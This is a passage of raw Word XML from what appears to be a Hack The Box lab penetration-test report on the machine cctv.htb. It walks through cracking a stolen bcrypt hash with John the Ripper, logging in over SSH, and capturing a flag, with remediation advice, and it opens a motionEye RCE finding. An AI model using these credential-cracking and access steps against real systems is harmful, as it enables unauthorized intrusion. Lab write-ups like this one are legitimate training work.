              <w:t xml:space="preserve">$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">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Remediation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Update ZoneMinder to the latest version immediately — this vulnerability is patched in newer releases. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="16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Developers should use parameterised queries (prepared statements) when passing user input to the database. This prevents SQL injection completely by separating commands from data.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:spacing w:after="13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References: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-51482  |  CWE-89: SQL Injection  |  OWASP A03:2021 — Injection</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Bdr>
          <w:bottom w:color="c55a11" w:space="1" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="110" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c55a11"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 3 — Weak Password — Bcrypt Hash Cracked  ·  HIGH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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123">
            <w:pPr>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEVERITY RATING: HIGH</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">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Description</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">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passwords in the database were stored as bcrypt hashes — a one-way scrambled representation of the original password. Bcrypt cannot be reversed directly. However, by taking a large list of common passwords, hashing each one, and comparing the result to the stolen hash, an attacker can find a match. This is called a dictionary attack.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">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Mark's password hash was cracked using John the Ripper with the rockyou.txt wordlist — a list of over 14 million real passwords leaked from previous data breaches. The password "opensesame" was found in this list, meaning mark chose a weak, commonly known password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">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Why Is This Rated HIGH?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:spacing w:after="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finding is rated HIGH because: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allowed direct SSH login to the server — moving from web application access to actual server access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dictionary attack is automated and requires minimal effort using freely available tools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SSH access exposed the full filesystem, running processes, and internal services as user mark</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the step that made the privilege escalation attack (Finding 4) possible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not rated Critical because it depended on the prior SQL injection attack to obtain the hash first</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">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Step-by-Step Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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1 — Mark's hash obtained from the database dump was saved to a file called hash.txt, then John the Ripper was run against it:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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132">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john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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34">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35">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36">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john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37">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Runs John the Ripper — a password cracking tool that tests thousands of passwords per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8">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hash.txt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39">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The file containing mark's bcrypt hash that was stolen from the database via SQL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3A">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--wordlist=/usr/share/wordlists/rockyou.txt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3B">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Specifies the dictionary file. rockyou.txt contains over 14 million real-world passwords from previous data breaches. If a user's password appears in this list, it will be cracked</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="3524250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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0292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8: John the Ripper cracks mark's bcrypt hash — password revealed as "opensesame"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">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2 — The cracked password "opensesame" was used to log into the server via SSH:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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13F">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ssh mark@cctv.htb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41">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42">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43">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44">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Initiates a Secure Shell connection — encrypted remote command-line access to the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5">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46">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The username to log in as — the account whose password was just cracked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47">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@cctv.htb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48">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The target hostname — resolves to 10.129.19.244 via the /etc/hosts entry added earlier</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="4048125"/>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0292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9: SSH login successful — inside the machine as user mark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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20"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="7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14C">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USER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4D">
            <w:pPr>
              <w:spacing w:after="20" w:before="40" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/home/sa_mark/user.txt</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0d6e6e"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">003488f02441d3fb0b4c7a7aa3ddacdc</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4752975" cy="4362450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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529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10: User flag captured at /home/sa_mark/user.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">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Remediation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Enforce a minimum password policy requiring at least 12 characters with a mix of uppercase, lowercase, numbers and symbols. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Prohibit dictionary words. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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Deploy a company password manager. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run periodic internal password audits.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:spacing w:after="13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References: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-521: Weak Password Requirements  |  NIST SP 800-63B Password Guidelines</w:t>
      </w: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pBdr>
          <w:bottom w:color="c00000" w:space="1" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="110" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="c00000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding 4 — Remote Code Execution in motionEye (CVE-2025-60787)  ·  CRITICAL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">
      <w:pPr>
        <w:spacing w:after="0" w:before="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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5C">
            <w:pPr>
              <w:spacing w:after="90" w:before="90" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEVERITY RATING: CRITICAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">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What Is Remote Code Execution?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:spacing w:after="10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Remote Code Execution (RCE) means an attacker can run any command they want on the target machine — as if they were sitting at the keyboard typing directly into the terminal. When the vulnerable service also runs as root (the most powerful user on Linux), any command executed through this vulnerability also runs as root — giving complete system control.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">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Why Is This Rated CRITICAL?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
